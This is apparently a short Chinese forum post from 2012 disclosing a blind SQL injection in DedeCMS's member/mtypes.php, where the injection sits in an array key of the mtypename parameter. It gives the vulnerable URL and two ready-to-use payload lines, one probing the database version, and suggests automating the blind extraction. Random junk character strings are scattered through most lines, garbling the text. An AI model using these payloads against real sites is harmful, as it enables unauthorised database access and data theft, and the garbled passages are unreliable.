需要magic_quotes_gpc = Off,所以说是鸡肋啊.; ]) M- B+ d3 c! w
' Y- y* |8 F, z0 t) g! [, ?. ?7 G. G
1 d) q0 k( T, e. N; S( d/ j发生在数组key里的注射漏洞,有点意思.$ n- E' D; y' G5 |) l" B
& ^3 h) f: `* |: v- p0 J这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
) I% z8 Y' t1 B1 r( A 2 S6 n0 t7 A; o2 c
http://www.xxx.com /dede/member/mtypes.php?dopost=save
2 U/ o8 O. s" A1 |$ P , b: d# p$ w p0 N; Z7 l
exploit:
& L, J' I: x8 q% Gmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
4 j- a0 j- S$ ]5 Fmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r' n4 B0 s, s* u
|
发表于 2012-12-20 08:08:09
收藏
支持
反对